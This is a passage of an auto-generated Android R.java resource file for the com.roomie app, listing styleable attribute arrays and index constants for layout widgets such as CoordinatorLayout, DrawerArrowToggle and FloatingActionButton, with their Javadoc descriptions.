type. @attr name com.roomie:scrimVisibleHeightTrigger */ public static final int CollapsingToolbarLayout_scrimVisibleHeightTrigger = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#statusBarScrim} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:statusBarScrim */ public static final int CollapsingToolbarLayout_statusBarScrim = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#title} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:title */ public static final int CollapsingToolbarLayout_title = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#titleEnabled} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:titleEnabled */ public static final int CollapsingToolbarLayout_titleEnabled = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#toolbarId} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:toolbarId */ public static final int CollapsingToolbarLayout_toolbarId = 10; /** Attributes that can be used with a CollapsingToolbarLayout_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CollapsingToolbarLayout_Layout_layout_collapseMode com.roomie:layout_collapseMode}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_Layout_layout_collapseParallaxMultiplier com.roomie:layout_collapseParallaxMultiplier}</code></td><td></td></tr> </table> @see #CollapsingToolbarLayout_Layout_layout_collapseMode @see #CollapsingToolbarLayout_Layout_layout_collapseParallaxMultiplier */ public static final int[] CollapsingToolbarLayout_Layout = { 0x7f010189, 0x7f01018a }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#layout_collapseMode} attribute's value can be found in the {@link #CollapsingToolbarLayout_Layout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>pin</code></td><td>1</td><td></td></tr> <tr><td><code>parallax</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:layout_collapseMode */ public static final int CollapsingToolbarLayout_Layout_layout_collapseMode = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#layout_collapseParallaxMultiplier} attribute's value can be found in the {@link #CollapsingToolbarLayout_Layout} array. <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:layout_collapseParallaxMultiplier */ public static final int CollapsingToolbarLayout_Layout_layout_collapseParallaxMultiplier = 1; /** Attributes that can be used with a ColorStateListItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ColorStateListItem_alpha com.roomie:alpha}</code></td><td> Alpha multiplier applied to the base color.</td></tr> <tr><td><code>{@link #ColorStateListItem_android_alpha android:alpha}</code></td><td></td></tr> <tr><td><code>{@link #ColorStateListItem_android_color android:color}</code></td><td> Base color for this state.</td></tr> </table> @see #ColorStateListItem_alpha @see #ColorStateListItem_android_alpha @see #ColorStateListItem_android_color */ public static final int[] ColorStateListItem = { 0x010101a5, 0x0101031f, 0x7f0101e5 }; /** <p> @attr description Alpha multiplier applied to the base color. <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:alpha */ public static final int ColorStateListItem_alpha = 2; /** <p>This symbol is the offset where the {@link android.R.attr#alpha} attribute's value can be found in the {@link #ColorStateListItem} array. @attr name android:alpha */ public static final int ColorStateListItem_android_alpha = 1; /** <p> @attr description Base color for this state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#color}. @attr name android:color */ public static final int ColorStateListItem_android_color = 0; /** Attributes that can be used with a CompoundButton. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CompoundButton_android_button android:button}</code></td><td></td></tr> <tr><td><code>{@link #CompoundButton_buttonTint com.roomie:buttonTint}</code></td><td> Tint to apply to the button drawable.</td></tr> <tr><td><code>{@link #CompoundButton_buttonTintMode com.roomie:buttonTintMode}</code></td><td> Blending mode used to apply the button tint.</td></tr> </table> @see #CompoundButton_android_button @see #CompoundButton_buttonTint @see #CompoundButton_buttonTintMode */ public static final int[] CompoundButton = { 0x01010107, 0x7f0100d9, 0x7f0100da }; /** <p>This symbol is the offset where the {@link android.R.attr#button} attribute's value can be found in the {@link #CompoundButton} array. @attr name android:button */ public static final int CompoundButton_android_button = 0; /** <p> @attr description Tint to apply to the button drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:buttonTint */ public static final int CompoundButton_buttonTint = 1; /** <p> @attr description Blending mode used to apply the button tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:buttonTintMode */ public static final int CompoundButton_buttonTintMode = 2; /** Attributes that can be used with a CoordinatorLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CoordinatorLayout_keylines com.roomie:keylines}</code></td><td> A reference to an array of integers representing the locations of horizontal keylines in dp from the starting edge.</td></tr> <tr><td><code>{@link #CoordinatorLayout_statusBarBackground com.roomie:statusBarBackground}</code></td><td> Drawable to display behind the status bar when the view is set to draw behind it.</td></tr> </table> @see #CoordinatorLayout_keylines @see #CoordinatorLayout_statusBarBackground */ public static final int[] CoordinatorLayout = { 0x7f0101dd, 0x7f0101de }; /** <p> @attr description A reference to an array of integers representing the locations of horizontal keylines in dp from the starting edge. Child views can refer to these keylines for alignment using layout_keyline="index" where index is a 0-based index into this array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:keylines */ public static final int CoordinatorLayout_keylines = 0; /** <p> @attr description Drawable to display behind the status bar when the view is set to draw behind it. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:statusBarBackground */ public static final int CoordinatorLayout_statusBarBackground = 1; /** Attributes that can be used with a CoordinatorLayout_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_android_layout_gravity android:layout_gravity}</code></td><td></td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_anchor com.roomie:layout_anchor}</code></td><td> The id of an anchor view that this view should position relative to.</td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_anchorGravity com.roomie:layout_anchorGravity}</code></td><td> Specifies how an object should position relative to an anchor, on both the X and Y axes, within its parent's bounds.</td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_behavior com.roomie:layout_behavior}</code></td><td> The class name of a Behavior class defining special runtime behavior for this child view.</td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_dodgeInsetEdges com.roomie:layout_dodgeInsetEdges}</code></td><td> Specifies how this view dodges the inset edges of the CoordinatorLayout.</td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_insetEdge com.roomie:layout_insetEdge}</code></td><td> Specifies how this view insets the CoordinatorLayout and make some other views dodge it.</td></tr> <tr><td><code>{@link #CoordinatorLayout_Layout_layout_keyline com.roomie:layout_keyline}</code></td><td> The index of a keyline this view should position relative to.</td></tr> </table> @see #CoordinatorLayout_Layout_android_layout_gravity @see #CoordinatorLayout_Layout_layout_anchor @see #CoordinatorLayout_Layout_layout_anchorGravity @see #CoordinatorLayout_Layout_layout_behavior @see #CoordinatorLayout_Layout_layout_dodgeInsetEdges @see #CoordinatorLayout_Layout_layout_insetEdge @see #CoordinatorLayout_Layout_layout_keyline */ public static final int[] CoordinatorLayout_Layout = { 0x010100b3, 0x7f0101df, 0x7f0101e0, 0x7f0101e1, 0x7f0101e2, 0x7f0101e3, 0x7f0101e4 }; /** <p>This symbol is the offset where the {@link android.R.attr#layout_gravity} attribute's value can be found in the {@link #CoordinatorLayout_Layout} array. @attr name android:layout_gravity */ public static final int CoordinatorLayout_Layout_android_layout_gravity = 0; /** <p> @attr description The id of an anchor view that this view should position relative to. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:layout_anchor */ public static final int CoordinatorLayout_Layout_layout_anchor = 2; /** <p> @attr description Specifies how an object should position relative to an anchor, on both the X and Y axes, within its parent's bounds. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td> Push object to the top of its container, not changing its size. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Push object to the bottom of its container, not changing its size. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Push object to the left of its container, not changing its size. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Push object to the right of its container, not changing its size. </td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td> Place object in the vertical center of its container, not changing its size. </td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td> Grow the vertical size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td> Place object in the horizontal center of its container, not changing its size. </td></tr> <tr><td><code>fill_horizontal</code></td><td>0x07</td><td> Grow the horizontal size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>center</code></td><td>0x11</td><td> Place the object in the center of its container in both the vertical and horizontal axis, not changing its size. </td></tr> <tr><td><code>fill</code></td><td>0x77</td><td> Grow the horizontal and vertical size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>clip_vertical</code></td><td>0x80</td><td> Additional option that can be set to have the top and/or bottom edges of the child clipped to its container's bounds. The clip will be based on the vertical gravity: a top gravity will clip the bottom edge, a bottom gravity will clip the top edge, and neither will clip both edges. </td></tr> <tr><td><code>clip_horizontal</code></td><td>0x08</td><td> Additional option that can be set to have the left and/or right edges of the child clipped to its container's bounds. The clip will be based on the horizontal gravity: a left gravity will clip the right edge, a right gravity will clip the left edge, and neither will clip both edges. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Push object to the beginning of its container, not changing its size. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Push object to the end of its container, not changing its size. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:layout_anchorGravity */ public static final int CoordinatorLayout_Layout_layout_anchorGravity = 4; /** <p> @attr description The class name of a Behavior class defining special runtime behavior for this child view. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:layout_behavior */ public static final int CoordinatorLayout_Layout_layout_behavior = 1; /** <p> @attr description Specifies how this view dodges the inset edges of the CoordinatorLayout. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0x0</td><td> Don't dodge any edges </td></tr> <tr><td><code>top</code></td><td>0x30</td><td> Dodge the top inset edge. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Dodge the bottom inset edge. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Dodge the left inset edge. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Dodge the right inset edge. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Dodge the start inset edge. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Dodge the end inset edge. </td></tr> <tr><td><code>all</code></td><td>0x77</td><td> Dodge all the inset edges. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:layout_dodgeInsetEdges */ public static final int CoordinatorLayout_Layout_layout_dodgeInsetEdges = 6; /** <p> @attr description Specifies how this view insets the CoordinatorLayout and make some other views dodge it. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0x0</td><td> Don't inset. </td></tr> <tr><td><code>top</code></td><td>0x30</td><td> Inset the top edge. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Inset the bottom edge. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Inset the left edge. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Inset the right edge. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Inset the start edge. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Inset the end edge. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:layout_insetEdge */ public static final int CoordinatorLayout_Layout_layout_insetEdge = 5; /** <p> @attr description The index of a keyline this view should position relative to. android:layout_gravity will affect how the view aligns to the specified keyline. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:layout_keyline */ public static final int CoordinatorLayout_Layout_layout_keyline = 3; /** Attributes that can be used with a DesignTheme. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #DesignTheme_bottomSheetDialogTheme com.roomie:bottomSheetDialogTheme}</code></td><td></td></tr> <tr><td><code>{@link #DesignTheme_bottomSheetStyle com.roomie:bottomSheetStyle}</code></td><td></td></tr> </table> @see #DesignTheme_bottomSheetDialogTheme @see #DesignTheme_bottomSheetStyle */ public static final int[] DesignTheme = { 0x7f010126, 0x7f010127 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#bottomSheetDialogTheme} attribute's value can be found in the {@link #DesignTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:bottomSheetDialogTheme */ public static final int DesignTheme_bottomSheetDialogTheme = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#bottomSheetStyle} attribute's value can be found in the {@link #DesignTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:bottomSheetStyle */ public static final int DesignTheme_bottomSheetStyle = 1; /** Attributes that can be used with a DrawerArrowToggle. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #DrawerArrowToggle_arrowHeadLength com.roomie:arrowHeadLength}</code></td><td> The length of the arrow head when formed to make an arrow </td></tr> <tr><td><code>{@link #DrawerArrowToggle_arrowShaftLength com.roomie:arrowShaftLength}</code></td><td> The length of the shaft when formed to make an arrow </td></tr> <tr><td><code>{@link #DrawerArrowToggle_barLength com.roomie:barLength}</code></td><td> The length of the bars when they are parallel to each other </td></tr> <tr><td><code>{@link #DrawerArrowToggle_color com.roomie:color}</code></td><td> The drawing color for the bars </td></tr> <tr><td><code>{@link #DrawerArrowToggle_drawableSize com.roomie:drawableSize}</code></td><td> The total size of the drawable </td></tr> <tr><td><code>{@link #DrawerArrowToggle_gapBetweenBars com.roomie:gapBetweenBars}</code></td><td> The max gap between the bars when they are parallel to each other </td></tr> <tr><td><code>{@link #DrawerArrowToggle_spinBars com.roomie:spinBars}</code></td><td> Whether bars should rotate or not during transition </td></tr> <tr><td><code>{@link #DrawerArrowToggle_thickness com.roomie:thickness}</code></td><td> The thickness (stroke size) for the bar paint </td></tr> </table> @see #DrawerArrowToggle_arrowHeadLength @see #DrawerArrowToggle_arrowShaftLength @see #DrawerArrowToggle_barLength @see #DrawerArrowToggle_color @see #DrawerArrowToggle_drawableSize @see #DrawerArrowToggle_gapBetweenBars @see #DrawerArrowToggle_spinBars @see #DrawerArrowToggle_thickness */ public static final int[] DrawerArrowToggle = { 0x7f0100db, 0x7f0100dc, 0x7f0100dd, 0x7f0100de, 0x7f0100df, 0x7f0100e0, 0x7f0100e1, 0x7f0100e2 }; /** <p> @attr description The length of the arrow head when formed to make an arrow <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:arrowHeadLength */ public static final int DrawerArrowToggle_arrowHeadLength = 4; /** <p> @attr description The length of the shaft when formed to make an arrow <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:arrowShaftLength */ public static final int DrawerArrowToggle_arrowShaftLength = 5; /** <p> @attr description The length of the bars when they are parallel to each other <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:barLength */ public static final int DrawerArrowToggle_barLength = 6; /** <p> @attr description The drawing color for the bars <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:color */ public static final int DrawerArrowToggle_color = 0; /** <p> @attr description The total size of the drawable <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:drawableSize */ public static final int DrawerArrowToggle_drawableSize = 2; /** <p> @attr description The max gap between the bars when they are parallel to each other <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:gapBetweenBars */ public static final int DrawerArrowToggle_gapBetweenBars = 3; /** <p> @attr description Whether bars should rotate or not during transition <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:spinBars */ public static final int DrawerArrowToggle_spinBars = 1; /** <p> @attr description The thickness (stroke size) for the bar paint <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:thickness */ public static final int DrawerArrowToggle_thickness = 7; /** Attributes that can be used with a FloatingActionButton. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #FloatingActionButton_backgroundTint com.roomie:backgroundTint}</code></td><td> Tint to apply to the background.</td></tr> <tr><td><code>{@link #FloatingActionButton_backgroundTintMode com.roomie:backgroundTintMode}</code></td><td> Blending mode used to apply the background tint.</td></tr> <tr><td><code>{@link #FloatingActionButton_borderWidth com.roomie:borderWidth}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #FloatingActionButton_fabCustomSize com.roomie:fabCustomSize}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_fabSize com.roomie:fabSize}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_hideMotionSpec com.roomie:hideMotionSpec}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_hoveredFocusedTranslationZ com.roomie:hoveredFocusedTranslationZ}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_maxImageSize com.roomie:maxImageSize}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_pressedTranslationZ com.roomie:pressedTranslationZ}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_rippleColor com.roomie:rippleColor}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_showMotionSpec com.roomie:showMotionSpec}</code></td><td></td></tr> <tr><td><code>{@link #FloatingActionButton_useCompatPadding com.roomie:useCompatPadding}</code></td><td></td></tr> </table> @see #FloatingActionButton_backgroundTint @see #FloatingActionButton_backgroundTintMode @see #FloatingActionButton_borderWidth @see #FloatingActionButton_elevation @see #FloatingActionButton_fabCustomSize @see #FloatingActionButton_fabSize @see #FloatingActionButton_hideMotionSpec @see #FloatingActionButton_hoveredFocusedTranslationZ @see #FloatingActionButton_maxImageSize @see #FloatingActionButton_pressedTranslationZ @see #FloatingActionButton_rippleColor @see #FloatingActionButton_showMotionSpec @see #FloatingActionButton_useCompatPadding */ public static final int[] FloatingActionButton = { 0x7f010045, 0x7f010122, 0x7f010123, 0x7f01012d, 0x7f010131, 0x7f010133, 0x7f01018b, 0x7f01018c, 0x7f01018d, 0x7f01018e, 0x7f01018f, 0x7f010190, 0x7f010191 }; /** <p> @attr description Tint to apply to the background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:backgroundTint */ public static final int FloatingActionButton_backgroundTint = 1; /** <p> @attr description Blending mode used to apply the background tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:backgroundTintMode */ public static final int FloatingActionButton_backgroundTintMode = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#borderWidth} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:borderWidth */ public static final int FloatingActionButton_borderWidth = 10; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int FloatingActionButton_elevation = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabCustomSize} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form 